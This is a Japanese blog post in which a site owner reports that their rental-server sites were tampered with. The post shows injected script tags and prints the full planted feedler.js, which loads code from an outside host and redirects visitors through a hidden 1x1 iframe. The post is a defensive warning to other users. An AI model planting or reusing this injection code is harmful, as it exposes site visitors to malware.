feedler.jsさくらサーバー改ざんなのか?

450views/2013-04-07

さくらレンタルサーバーのスタンダードで妙な自動生成ファイルを発見。これもどうやら改竄と見て取れます。まず.htmlであろうが.phpであろうが下記のようなJavascriptが見覚えもなく記述されています。

  • <script id=33935 language="javascript" src="js/feedler.js"></script>
  • <script id=33541 language="javascript" src="js/feedler.js"></script>
  • <script id=33907 language="javascript" src="js/feedler.js"></script>
  • <script id=33982 language="javascript" src="js/feedler.js"></script>
  • など複数のドメイントップページファイルに

</body>直前に大体ありました。または、</body>直前に<script>がある場合はその上にありました。/index.phpファイルや/index.htmlファイルに改ざんされている感じです。他のカテゴリーや個別ページには、この記述が自動にされた形跡はありません。

さくらスタンダードは20個マルチドメイン入れられるのですが、改竄記述のscript id=33935のようにidはバラしていろいろ他のドメインフォルダにも渡っていますし、自分でまさかやったのを忘れている訳でもないことがわかります。

次に、

/js/フォルダを生成され、その中にfeedler.jsというファイルが作られています。そうですね、既存ファイルのJavascript記述のsrcです。機能させるJavascriptファイルも勝手に作られています。怖いんですけど…見に覚えはありません。

/js/feedler.js

document.write('<script src="http://kopii-vertu.ru/url.txt" type="text/javascript"></script>');
document.write('<script type="text/javascript">\r' +
'function changesite()\r' +
'{\r' +
' document.getelementbyid( "ifrm" ).src = geturl();\r' +
'}\r' +
'window.onload=changesite;\r' +
'</script>\r' +
'<iframe id="ifrm" src="" width="1" height="1" frameborder="no">');

さくらは2つ契約しているのですが、片方だけでの現象です。既存ファイルに記述されてしまうことやCMS等でファイルの吐き出しは侵入されてれば出来そうですが、index.htmlだけのドメインも中にはあります。FTPで接続していじったみたいなこんなことが平気で起こるんですね。もうよくわかりませんが、取りあえずFTPはパスワードを変えてさらに複雑にして様子見です。もちろんファイルも抹消、記述も抹消。

あー気持ち悪。

何かfeedler.jsだと自分で作業したファイルなのかと思ってしまうほどまっとうな名前なので怪しまないですが、よくよく考えると身に覚えがない。厄介です。さくらレンタルサーバーを使っている方はCheckしてみてもいいかと思います。/js/フォルダは意外とみなさん使うと思います。それをあえて狙って自然を装う改竄意図も見え隠れしてますね。このfeedler.js、あれ?何だっけ?記憶にないなと思った方、正解です。改竄ですから。。。

WordPress改ざんの時は検索結果のクリック時だけ発生するメカニズム、この改ざんは何か自社でやったかのような自然な装い。改ざんはこのように見つけにくいとか自然に気づけないとか見破れないとか必ずそのような意図がありますね。怖い怖い。

450views/2013-04-07

関連おすすめ記事